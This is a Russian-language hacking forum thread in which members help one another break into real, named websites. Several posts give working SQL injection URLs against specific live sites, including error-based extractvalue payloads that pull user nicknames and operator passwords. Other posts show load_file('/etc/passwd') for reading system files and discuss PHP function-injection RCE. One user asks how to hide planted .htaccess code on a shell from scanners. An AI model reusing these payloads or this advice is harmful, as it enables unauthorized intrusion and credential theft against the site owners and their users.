Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. lion_art

    lion_art New Member

    Joined:
    20 Mar 2014
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    В том то и дело, что не могу понять в чем ошибка моего запроса. 5я ветка... information_schema должна быть по определению...
    Unknown column 'information_schema' in 'where clause'
     
  2. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    824
    Likes Received:
    289
    Reputations:
    352
    information_schema - бд "по определению" а не колонка/таблица =)

    у тебя же
    а надо, если нужна именно information_schema (хотя непонятно зачем она тебе):
     
    _________________________
    #23782 KIR@PRO, 18 Jan 2015
    Last edited: 18 Jan 2015
    2 people like this.
  3. GhostW

    GhostW Member

    Joined:
    17 Oct 2012
    Messages:
    209
    Likes Received:
    46
    Reputations:
    33
    Code:
    http://www.puntoverdefolletto.com/prodotto.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    в примере версия >5.1. у вас тоже? почему бы не использовать более короткий и понятный вектор?
    Code:
    http://www.paid2earn.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,version())))
     
    _________________________
  5. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    122
    Likes Received:
    5
    Reputations:
    1

    версия 5.5.4 www.werbevirus.de/img/media.php?art=bannerklick
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    Code:
    http://werbevirus.de/img/media.php?art=1+|(extractvalue(1,concat(0x5c,(SELECT nickname FROM netzwerk_user LIMIT 0,1))))
    а те колонки из вашего запроса - пустые.
     
    _________________________
  7. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    122
    Likes Received:
    5
    Reputations:
    1
    спасибо

    я маленько не так сделала
    1 |(ExtractValue(1,concat(0x5c,(SELECT GROUP_CONCAT(CONCAT_WS(0x3a,betreiber_id,betreiber_passwort,betreiber_kennung)) FROM netzwerk_schnittstelle ))))

    пустые но не все))
     
  8. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    967
    Likes Received:
    119
    Reputations:
    25

    select load_file('/etc/passwd')
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей
    или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача :)
     
    _________________________
    #23790 yarbabin, 20 Jan 2015
    Last edited: 20 Jan 2015
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Если freebsd, то через пма можно узнать.
    select load_file('home/user/') покажет все папки в папке user и т.д.
     
    _________________________
    2 people like this.
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    error based в limit
    Code:
    num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+extractvalue(1,concat(0x3A,version()))))--+
    5.5.32
     
    _________________________
    #23792 yarbabin, 23 Jan 2015
    Last edited: 23 Jan 2015
    4 people like this.
  13. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    11
    Likes Received:
    6
    Reputations:
    2
    есть уязвимый кусок кода:
    PHP:
    $function($param1$param2);
    могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
    Code:
    Fatal error: Call to undefined function phpinfo();exit()
    Есть какой-нибудь вариант внедрения произвольного кода?
     
  14. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    нормально напишите сударь что за функция?
     
  15. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    11
    Likes Received:
    6
    Reputations:
    2
    вроде предельно ясно написано, могу передавать произвольное значение. Например:
    PHP:
    $function $_REQUEST['action'];
    $function($param1$param2); 
     
  16. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    329
    Likes Received:
    591
    Reputations:
    764
    Если не контролируются параметры (хотя бы один), то вряд ли получится RCE.
     
  17. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,432
    Likes Received:
    398
    Reputations:
    228
    http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bview%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpicalendar&tx_cal_controller%5Buid%5D=357&tx_cal_controller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_controller%5Bday%5D=04
    Можно чё нить с этим сделать?
    Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
     
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.

    Конечно могут.
     
  20. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,432
    Likes Received:
    398
    Reputations:
    228
    Это очевидно, что ведёт лог, по всем признакам похоже на иньекцию error base и я уверен что это SQLi! только вот у самого не получилось запрос составить, думал может кому то повезёт...
     
    #23800 DezMond™, 27 Jan 2015
    Last edited: 27 Jan 2015
Loading...
Thread Status:
Not open for further replies.